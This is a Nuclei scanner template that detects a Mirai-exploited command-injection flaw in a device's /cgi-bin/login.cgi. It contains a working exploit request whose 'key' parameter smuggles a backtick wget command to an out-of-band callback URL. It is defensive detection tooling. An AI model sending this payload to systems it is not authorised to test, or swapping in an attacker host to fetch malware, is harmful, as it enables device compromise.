nuclei-templates/vulnerabilities/other/mirai-unknown-rce.yaml

25 lines
675 B
YAML

id: mirai-unknown-rce
info:
name: Mirai Unknown - Remote Code Execution
author: gy741
severity: critical
description: The unknown exploit targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection.
reference:
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
tags: mirai,rce,oob
requests:
- raw:
- |
POST /cgi-bin/login.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
key=';`wget http://{{interactsh-url}}`;#
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"